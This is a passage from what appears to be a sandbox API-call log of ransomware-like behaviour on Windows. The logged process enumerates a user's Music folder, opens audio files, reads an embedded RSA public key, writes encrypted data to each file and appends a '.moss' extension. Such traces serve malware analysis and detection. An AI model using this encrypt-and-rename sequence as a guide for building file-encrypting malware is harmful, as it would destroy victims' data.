lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.564] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\") returned="DENcIRfHVVVix5\\" [0171.564] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0171.565] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.565] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.565] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.565] PathFindFileNameW (pszPath="") returned="" [0171.565] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d0ec80, ftCreationTime.dwHighDateTime=0x1d5df00, ftLastAccessTime.dwLowDateTime=0xe45dc290, ftLastAccessTime.dwHighDateTime=0x1d5e71f, ftLastWriteTime.dwLowDateTime=0xe45dc290, ftLastWriteTime.dwHighDateTime=0x1d5e71f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.566] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.566] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d0ec80, ftCreationTime.dwHighDateTime=0x1d5df00, ftLastAccessTime.dwLowDateTime=0xe45dc290, ftLastAccessTime.dwHighDateTime=0x1d5e71f, ftLastWriteTime.dwLowDateTime=0xe45dc290, ftLastWriteTime.dwHighDateTime=0x1d5e71f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.566] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cbdebb0, ftCreationTime.dwHighDateTime=0x1d5df64, ftLastAccessTime.dwLowDateTime=0xb8877a50, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0xb8877a50, ftLastWriteTime.dwHighDateTime=0x1d5e321, nFileSizeHigh=0x0, nFileSizeLow=0xa56a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H97IrW ql.wav", cAlternateFileName="H97IRW~1.WAV")) returned 1 [0171.566] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\H97IrW ql.wav") returned=".wav" [0171.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\H97IrW ql.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\h97irw ql.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.567] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=42346) returned 1 [0171.567] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.570] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa544, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.570] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.570] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xa56a, lpOverlapped=0x0) returned 1 [0171.571] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.571] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.572] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.572] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.572] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.572] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.572] GetLastError () returned 0x0 [0171.572] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.572] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.573] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.573] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.573] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.573] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.573] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa56a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.573] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.574] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\H97IrW ql.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\h97irw ql.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\H97IrW ql.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\h97irw ql.wav.moss")) returned 1 [0171.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.574] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3280 | out: hHeap=0xcd0000) returned 1 [0171.576] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8c36a0, ftCreationTime.dwHighDateTime=0x1d5e718, ftLastAccessTime.dwLowDateTime=0xb0e02dc0, ftLastAccessTime.dwHighDateTime=0x1d5dd58, ftLastWriteTime.dwLowDateTime=0xb0e02dc0, ftLastWriteTime.dwHighDateTime=0x1d5dd58, nFileSizeHigh=0x0, nFileSizeLow=0xb0ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KdAWNP-F.mp3", cAlternateFileName="")) returned 1 [0171.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa6) returned 0x35e3280 [0171.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.576] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\KdAWNP-F.mp3") returned=".mp3" [0171.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\KdAWNP-F.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\kdawnp-f.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.576] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=45242) returned 1 [0171.576] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.579] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xb094, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.579] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.580] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.580] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xb0ba, lpOverlapped=0x0) returned 1 [0171.581] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.581] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.581] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.581] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.582] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.582] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.582] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.582] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.582] GetLastError () returned 0x0 [0171.583] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.583] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.583] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.583] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.583] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0c0) returned 0x3b62d40 [0171.583] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.583] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c9d0 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4de60 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4ca18 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4de78 [0171.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dea8 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dec0 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.584] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dea8 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dec0 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dec0 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4dea8 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa2470 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2588 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0171.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dec0 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dea8 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.585] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0171.585] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0171.585] GetCurrentThreadId () returned 0x324 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4ef68 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.585] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.585] GetCurrentThreadId () returned 0x324 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.585] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.585] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.585] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.585] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0171.585] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0171.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.586] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dea8 [0171.586] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0171.586] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.586] RtlAllocateHeap 